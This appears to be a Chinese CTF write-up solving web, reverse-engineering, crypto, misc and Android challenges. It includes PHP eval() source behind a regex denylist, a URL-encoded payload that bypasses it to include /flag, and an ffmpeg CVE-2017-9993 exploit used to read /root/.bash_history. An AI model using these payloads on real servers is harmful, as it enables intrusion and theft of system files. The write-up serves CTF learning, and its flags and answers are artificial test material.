Web

shell

<?php
// Challenge source as served: the only gate in front of eval() is a regex
// denylist loaded from waf.php, so this file is the whole attack surface.
// Disables all PHP diagnostics; a rejected or failing input leaves no error
// output for the operator to notice.
error_reporting(0);
// Presumably defines $waf, the denylist pattern used below (waf.php is not shown on this page).
require "waf.php";
if (!isset($_GET['code'])) {
// No parameter: print this file's own source (the usual CTF hint).
show_source(__FILE__);
 exit();
} else {
$code = $_GET['code'];
// A single negative regex match is the entire security boundary: anything the
// denylist fails to match is executed verbatim. Denylist filtering in front of
// eval() is not a reliable control; the mitigation is to never eval user input.
if (!preg_match($waf, $code)) {
eval("$code");
} else die('hacker');
}
?>

用require包含,取反/flag,url编码括号,然后结尾用?>

?code=require%40%7e%D0%99%93%9E%98?>

图片

hunan_ffmpeg

cve-2017-9993,github上找到exp

图片

读root用户的历史命令,/root/.bash_history

图片

得到/var/www/flag_aaaa.txt文件路径

图片

RE

re1

窗口程序,找到按钮事件处理函数即可。IDA中化简一下流程,如下。

图片

可以看见程序读取文本框输入,进行base64编码。需要注意的是这个base64算法对base64表进行了移动,到时候修正一下即可;base64编码输出的字符串再与key进行异或,并与一个数组进行比较。这个key由rand函数给出,由于这里没有调用srand进行初始化,rand的值不会动态变化。我们拖入OD取得这个值即可解密数据了。

图片

可以看见这个值是0x29。接下来写个脚本即可。

import base64

# Recover the input the button handler expects: the comparison array is
# XORed with the fixed rand() value, then the shifted base64 alphabet is
# mapped back onto the standard one and decoded.
data = [
    0x47, 0x68, 0x65, 0x5F, 0x47, 0x7B, 0x6E, 0x7B, 0x4A, 0x1A,
    0x1D, 0x79, 0x4B, 0x51, 0x50, 0x78, 0x4F, 0x40, 0x4B, 0x1B,
    0x4F, 0x51, 0x1C, 0x1A, 0x4A, 0x41, 0x47, 0x1C, 0x4B, 0x51,
    0x5C, 0x7D, 0x4B, 0x1D, 0x11, 0x7B, 0x4B, 0x67, 0x50, 0x66,
    0x4B, 0x41, 0x47, 0x1D, 0x48, 0x67, 0x48, 0x62, 0x4F, 0x45,
    0x66]
# rand() is never seeded with srand(), so the value observed in the debugger is constant.
key = 0x29

# Undo the XOR layer; & 0xFF keeps every value inside one byte.
s = [(byte ^ key) & 0xFF for byte in data]
print(''.join(map(chr, s))) # enstr
enstr = "nALvnRGRc34PbxyQfib2fx53chn5bxuTb48RbNyObhn4aNaKflO"
b64_table1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
b64_table2 = "0123456789+/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
# Translate each character of the shifted alphabet to the standard one;
# characters not present in the shifted table are dropped.
remap = dict(zip(b64_table2, b64_table1))
flag = ''.join(remap[ch] for ch in enstr if ch in remap)
# 51 characters is 3 mod 4, so exactly one '=' of padding is missing.
print(base64.b64decode(flag + '='))

flag{7815696ECBF1C96E6894B779456D330E}

CRYPTO

math

读脚本,可知该加密代码对flag按位进行先+=pad后*=ord(char)的操作,反向思考,应先/=ord(char)后-=pad的操作。类似递归的思想,想到用yafu先分解因数,得

***factors found***

P1 = 3
P1 = 3
P1 = 5
P1 = 5
P1 = 7
P3 = 107
P3 = 487
P3 = 607
P5 = 29287
P5 = 28429
P19 = 1002528655290265069
P12 = 420577267963
P16 = 3680317203978923

经过搜索,在https://0x90r00t.com/fr/2017/07/16/meepwn-2017-crypto-100-math-write-up/#more-3278找到类似脚本:

#!/usr/bin/python
import itertools
from Crypto.Util.number import *
from hashlib import md5

# NOTE: this is Python 2 code (print statements below); on ints `/` floors here,
# which every `l*ord(c) == hack` exactness test below relies on. Under Python 3
# those divisions would have to become `//`.
# Apparently the prime factorisation of `hack` (the yafu output above), smallest first.
l = [3,3,5,5,7,107,487,607,28429,29287,420577267963,3680317203978923,1002528655290265069] 

nbre_permutation = 6
# Every ordered choice of 6 factors; each product is a candidate for the pad
# that the encryption added before every multiply (see the verification loop
# at the bottom), so it must divide `hack`.
comb = list(itertools.permutations(l, nbre_permutation))
candidat = list()
for i in comb:
    p = 1
    for j in range(nbre_permutation):
        p *= i[j]
    # NOTE(review): `p not in candidat` scans a list, so this dedup is quadratic
    # in the number of distinct products; a companion set would make it O(1).
    if p not in candidat and p > 10000000000000000000000000000000000000: candidat.append(p) # At least 37 digits

# Printable ASCII from ' ' to '}' — the alphabet the flag is assumed to use.
charset = [' ', '!', '"', '#', '$', '%', '&', "'", '(', ')', '*', '+', ',', '-', '.', '/', '0', '1',
          '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?', '@', 'A', 'B', 'C', 'D', 'E',
          'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
          'Z', '[', '\\', ']', '^', '_', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
          'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}']

# The encrypted value to invert.
hack = 64364485357060434848865708402537097493512746702748009007197338675
# Peel one character at a time from the end of the flag: each level divides by
# a candidate last character (the `l*ord(c) == hack` test demands an exact
# division) and subtracts the pad candidate p, reversing the
# `+= pad; *= ord(char)` steps in reverse order. The nesting depth fixes the
# flag length at 14 characters.
for p in candidat:
    for c in charset:
        l = hack/ord(c)
        if l*ord(c) == hack:
            h = hack/ord(c) - p
            for c1 in charset:
                l1 = h/ord(c1)
                if l1*ord(c1) == h:
                    h1 = h/ord(c1) -p
                    for c2 in charset:
                        l2 = h1/ord(c2)
                        if l2*ord(c2) == h1:
                            h2 = h1/ord(c2) -p
                            for c3 in charset:
                                l3 = h2/ord(c3)
                                if l3*ord(c3) == h2:
                                    h3 = h2/ord(c3) - p
                                    for c4 in charset:
                                        l4 = h3/ord(c4)
                                        if l4*ord(c4) == h3:
                                            h4 = h3/ord(c4) - p
                                            for c5 in charset:
                                                l5 = h4/ord(c5)
                                                if l5*ord(c5) == h4:
                                                    h5 = h4/ord(c5) - p
                                                    for c6 in charset:
                                                        l6 = h5/ord(c6)
                                                        if l6*ord(c6) == h5:
                                                            h6 = h5/ord(c6) - p
                                                            for c7 in charset:
                                                                l7 = h6/ord(c7)
                                                                if l7*ord(c7) == h6:
                                                                    h7 = h6/ord(c7) - p
                                                                    for c8 in charset:
                                                                        l8 = h7/ord(c8)
                                                                        if l8*ord(c8) == h7:
                                                                            h8 = h7/ord(c8) - p
                                                                            for c9 in charset:
                                                                                l9 = h8/ord(c9)
                                                                                if l9*ord(c9) == h8:
                                                                                    h9 = h8/ord(c9) - p
                                                                                    for c10 in charset:
                                                                                        l10 = h9/ord(c10)
                                                                                        if l10*ord(c10) == h9:
                                                                                            h10 = h9/ord(c10) - p
                                                                                            for c11 in charset:
                                                                                                l11 = h10/ord(c11)
                                                                                                if l11*ord(c11) == h10:
                                                                                                    h11 = h10/ord(c11) - p
                                                                                                    for c12 in charset:
                                                                                                        l12 = h11/ord(c12)
                                                                                                        if l12*ord(c12) == h11:
                                                                                                            h12 = h11/ord(c12) - p
                                                                                                            for c13 in charset:
                                                                                                                l13 = h12/ord(c13)
                                                                                                                if l13*ord(c13) == h12:
                                                                                                                    h13 = h12/ord(c13) - p
                                                                                                                    # Characters were recovered last-first, so sol is the flag reversed.
                                                                                                                    sol = c+c1+c2+c3+c4+c5+c6+c7+c8+c9+c10+c11+c12+c13
                                                                                                                    # h13 == 0 means the whole value was consumed: a full-length candidate.
                                                                                                                    if h13 == 0:
                                                                                                                        flag = sol[::-1] # reverse the string # re-check the candidate to weed out false positives
                                                                                                                        # The pad is taken to be md5(flag) as an integer; re-encrypt with it.
                                                                                                                        pad2 = bytes_to_long(md5(flag).digest())
                                                                                                                        hack2 = 0
                                                                                                                        for char in flag:
                                                                                                                            hack2 += pad2
                                                                                                                            hack2 *= ord(char)
                                                                                                                            # Evaluated after every character; it can only hold once the full flag has been re-encrypted.
                                                                                                                            if hack2 == hack:
                                                                                                                                print "Bingo !!!"
                                                                                                                                print sol[::-1]

Bingo !!!
d0y0ul1keM@TH?

flag包裹后上交。

rsa

查看附件得到n、e、c,同时得到一个等式2d+phi(n)

求得私钥d,需要变换等式2d+phi(n)

$(2d+\phi(n))\cdot e \equiv 2 \pmod{\phi(n)} \implies (2d+\phi(n))\cdot e - 2 \equiv 0 \pmod{\phi(n)}$

#!/usr/bin/python
# -*- coding: utf-8 -*-
import gmpy2
import binascii

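# Challenge values from the attachment: modulus n, public exponent e,
# ciphertext c and the leaked quantity a = 2d + phi(n).
n=22561172536677648559787604959523195072179259409010314452272275495363968755657659138742248552894595529382230922241140656549843203305826473571445603834757787255736898096406153231539420740606617993518122317969410178044748567867122389763000873035273736666346624950112390179154333942974763371969584888993523474785703126407758739432302547292610981495520537518042779911203114321445895667363586256353373620877601821136901641493999842631467944779970213905636039444786194077923883593166806502276718151627041975659783265190382918098071120315433981040541826821825277381380527761087122467964932153713194745798177997722042776467823
e=65537
c=19328196358751658895450655392637127310222166740765135237100788629359244004186017531913542633846914446577530070361990508415396536818488820222120779983101438854297373364445564149526771854808100054824945213757075977600155153794380392843250249421227703382007213012131876851828154156292326203220320138218001022549062888054700986604924812634110284449199586085012678155983265546720208230278018003075240556412400816319188195980878492235194635353445804239756712398169138480766013684092405117638265070954612493845540746705265223696626365851780172702852574231465793269945857869635628236488314786408909172723290733282538209968247
a =24114829899810646031152927156356440623523513950820570971172657869605295042116148846058663431685177495769257006671204194892172258274371716987566720411992577862665150660975369465525447840121901649254226473481778722127378865051369383216827923429416969207860136204997233907126159519798979336641129811969668501246242088955574999107571615543760265312436830459903515683689045577164832265662220035876790112563967655077079968881948607640842264058086427875121914327767238217629898601698947580820398969991591620306905238666381003642185305206988597488619954300386153696163111726576675781435154124871145727025050765235161063120482

# (2d + phi(n))*e - 2 = 2(de - 1) + e*phi(n). Since de ≡ 1 (mod phi(n)) both
# terms are multiples of phi(n), so kphi is a multiple of phi(n) and the
# inverse of e modulo kphi is congruent to d modulo phi(n).
kphi = a*e -2
# Modular inverse via pow(x, -1, m) (Python 3.8+); gmpy2.invert(e, kphi) is the
# equivalent on older interpreters. Raises ValueError if e and kphi share a factor.
d = pow(e, -1, kphi)
m = pow(c, d, n)
# Convert the integer plaintext to bytes by its length. This replaces
# binascii.unhexlify(hex(m)[2:]), which breaks when the hex string has odd length.
plaintext = m.to_bytes((m.bit_length() + 7) // 8, "big")
print(plaintext)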

//easyctf{ilnirawvhfpey2nrxx}

crypto

观察给定的k,通过测试得rand=2

printord('f')&15^1
printord('f')&15^2
printord('f')&15^3
printord('f')&15^4
printord('l')&15^1
print ord('l')&15^2
printord('l')&15^3
printord('l')&15^4

后根据逻辑写解密脚本:

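# Each plaintext byte was split into two entries of k: (low nibble ^ rand, high nibble),
# with rand = 2 established by the checks above. Undo it pair by pair.
k = [4, 96, 14, 96, 3, 96, 5, 96, 9, 112, 4, 48, 7, 48, 3, 48, 0, 48, 0, 96, 6, 96, 6, 48, 1, 48, 6, 96, 11, 48, 1, 96, 3, 96, 3, 96, 4, 48, 7, 96, 2, 48, 0, 48, 1, 96, 11, 48, 11, 48, 2, 48, 0, 96, 2, 48, 3, 96, 10, 48, 0, 48, 4, 48, 7, 48, 0, 48, 6, 96, 1, 96, 3, 96, 15, 112]
RAND = 2

chars = []
# Pairing even and odd positions with zip never reads past the end of k, unlike
# indexing k[j+1] from a loop over every j; a trailing unpaired entry is ignored.
for low, high in zip(k[0::2], k[1::2]):
    nibble = low ^ RAND
    # Only pairs that a brute-force search over chr(0..127) could have matched:
    # a genuine low nibble, a genuine high nibble, and a 7-bit result.
    if nibble < 16 and high & 15 == 0 and high < 128:
        chars.append(chr(high | nibble))
str1 = ''.join(chars)
print(str1)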

得flag{6512bd43d9caa6e02c990b0a82652dca}

MISC

签到

右键查看源码有一个index.js,搜索flag关键字可以看到有一串this_is_flag的加密,把他丢到console控制台中eval一下就得到flag

misc2

流量包里导出http对象,提取出white.jpg,foremost出来一个加密压缩包

追踪tcp流,流0的post里读取出rsa密码的三个参数

pubkey.pem

-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA1uyGE5HNypEkYCvQatds
VUbaZ23H9VNOper1LpjHmTC3BO9/JNT2ktLugWW7zlMQ6l4FxxavI7YMA6wnB2zD
ZHYwkwoLlf38ukuc9DXFP0Pk+5HwW/D4KiLOGyIYw4Ro9YhQyVFZ9TyVKFP2g2un
Bq+JhHzQylUQoR6ag8mpyzmB0322WU+lqBK5+luTVYXx4Yv9n2dcyxGLRJCNP5PQ
dfBa2n81MNA9spiEQhE0BfmiUr/9w0jSB2YCSGlNc2YUGnzYAmLaGV8c8T4CkkLD
fwq1aFLw/DBFXKq5cMiLB4YTDYJZKtpbnqSj010BnzxQLR/MCYwkRG/UJ3si6JGV
Phgl05m9ZGc3ACyKDmSHDMrTZooVGDvvDlKRQgi3mjeyP3MDb2BVmNj7kbUdWi+g
aNDVZ5arEYBRt2WLnYxBOx0zZzvTXM79xbQz8ZwzV13a+EeZX11ofQtGvmV9PHfc
a8xUHWdcVGYwA9hU6PoCsXP59cDsCUS+j0jI/asSVMaPWGf+XiVsvENhhF1WEL6z
K6WUwats8ZaN32n2OkQq/XWF+41+jnQC+SnoqxIu8c6bltSa5sq3DzMiJa9mQTEJ
Sv5vQ7tyHNzOZaf9phzTt/S3D663m+aN55Ks1XUh4Tb+QMiKDOi9RmKnpuKwONGv
ejS6TGaMbwhqLwE6o3I30XMCAwDXPw==
-----END PUBLIC KEY-----
分解成n,e
e=55103
n=876813098747546421463300168862219142063670563967729290497344962728682618208375464557133456578904345237283080342121965674942529286999978893353279886394405628316761715180267880166683614455146832334288190677051366196783349078678400070058376390308238544603721083947689923203385385100201810815669307016233238063111244927006818355401316422651700327734122036175405884468111770133076783036163061469574066454827377969469943581423210808147803335010614103495276743164640007085655873215469085138533528671109499311890770132613373981258581619132892549042554356642121626636491037841897222588276842791469310645700904898072520666967004441441270782094397868123164550631074972971503177681742614908764511711713702834462612716322611390677546531575344585304592749936616311681433327531718831987275251485286576443059281134729361333494789576836028432229505203632510231542054739381738901834961574382652680697797327076172559649811127134401032309848035722886023564579780220217473171744413771996476842677457220805828808013215982370374465310715382727188771178750512250241377916497380631154287944620268359285935412030748504705929500744554104293537787353729941338060882119353175475459195528864413817698279035296256820460236171632150286837130413114595288845076910451

test.enc
test.enc

sorsi.html

--------------------------8e31e207cbc93307
Content-Disposition: form-data; name="message"
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
--------------------------8e31e207cbc93307--
4F87A8A98068BF5CEB65D57D9306068012B72FA6181416C160C93CC90E740215

white.jpg尾部

dp=7751661012749222949258552809385749174895956865739325972299639559465809374742308483735506628879118519880945143001221780630055809832772990692212180986487725219300423093229284048997022795756680499342282151274879960921884034548750862023448485065532494904944319853368483751898299769368013407879672169103329790632327580145567337253252494063666153226153788611531854510389023963152458385741697618500707069007654653605202699110946731128724360785116505369040140205472710852590024476477761130687452901656129261260250611670662318568267301970581979667048365222210854306670337482562374349963775733552611475779811292166914098523277

已知n、e、dp,属于rsa的dp泄露

import gmpy2 as gp
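# Public key and the leaked CRT exponent dp = d mod (p-1) taken from the capture.
e = 55103
n = 876813098747546421463300168862219142063670563967729290497344962728682618208375464557133456578904345237283080342121965674942529286999978893353279886394405628316761715180267880166683614455146832334288190677051366196783349078678400070058376390308238544603721083947689923203385385100201810815669307016233238063111244927006818355401316422651700327734122036175405884468111770133076783036163061469574066454827377969469943581423210808147803335010614103495276743164640007085655873215469085138533528671109499311890770132613373981258581619132892549042554356642121626636491037841897222588276842791469310645700904898072520666967004441441270782094397868123164550631074972971503177681742614908764511711713702834462612716322611390677546531575344585304592749936616311681433327531718831987275251485286576443059281134729361333494789576836028432229505203632510231542054739381738901834961574382652680697797327076172559649811127134401032309848035722886023564579780220217473171744413771996476842677457220805828808013215982370374465310715382727188771178750512250241377916497380631154287944620268359285935412030748504705929500744554104293537787353729941338060882119353175475459195528864413817698279035296256820460236171632150286837130413114595288845076910451
dp = 7751661012749222949258552809385749174895956865739325972299639559465809374742308483735506628879118519880945143001221780630055809832772990692212180986487725219300423093229284048997022795756680499342282151274879960921884034548750862023448485065532494904944319853368483751898299769368013407879672169103329790632327580145567337253252494063666153226153788611531854510389023963152458385741697618500707069007654653605202699110946731128724360785116505369040140205472710852590024476477761130687452901656129261260250611670662318568267301970581979667048365222210854306670337482562374349963775733552611475779811292166914098523277

# e*dp ≡ 1 (mod p-1), so e*dp - 1 = x*(p-1) for some integer 1 <= x < e and
# p = (e*dp - 1)//x + 1. Try every x and keep the candidate that divides n.
# e*dp is hoisted out of the loop because it never changes.
ed = e * dp
p = None
for x in range(1, e):
    if ed % x != 1:
        continue
    cand = (ed - 1) // x + 1
    if n % cand == 0:
        p = cand
        break
if p is None:
    # The original would fail with an undefined d; make the failure explicit.
    raise ValueError("no factor of n recovered from dp")
q = n // p
phin = (p - 1) * (q - 1)
# Modular inverse via pow(x, -1, m) (Python 3.8+); gp.invert(e, phin) is the
# gmpy2 equivalent on older interpreters.
d = pow(e, -1, phin)
print(d)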

//得到d=39557870959592044058540627911211309496221349509532602874188330532702484236176277242419355988878213568406180021605270251490973772888625801297139063164918287425284823402321941638284221649193238574724433189175719949280500259688120475730271014396789304064839493579187288334276102342142926913012973835224140787704744839455908942009104270669693610415894368399761519858950072782803638325098476867200717369411844393809815794846344156743833168626687960025574977469598661735566856628743555625907742813937139816150853030682119806860040903492811115128392104433738895592223957317658866039135005919452529014122868983115407262364659369886183827966340637963977354022937302149780698541235857495841317173188649283601978311128083999051365006833479326277586269068164424676321975332128323329544397406285578595752816634651956740374500628888764026413455182904712311034776593291188920983488659491148195165297190218263356564894924217336570106573440048146590271033442228757600297227611043677976886726380970675705219837965823886794335005198887893736374428303322728833081754259056407293976488715776723647659077365229859871626801704661498721314726715411100169578026061415643014249578920231096739831781719181165441022216744199217481959573316580319725361562273615

helloapp

题目给了个app,结合题目名字,最终发现一个叫做hell的文件,查看文件头是个doc文件,打开后发现加密了,于是尝试用爆破工具爆破,爆破成功,如下:

图片

图片

flag{fbe6a8ce-8331-439d-bfa6-79a0e874181c}

安卓

SVIP

下载压缩包,把后缀改为.zip,然后解包。

flag藏得挺深的。在layout目录下。

图片

flag{SG5zd2V0aGV3ZWF0aGVyaXMxMjNfQDIyMjE=}

里面是一段base64编码,解码后得到:

flag{Hnswetheweatheris123_@2221}
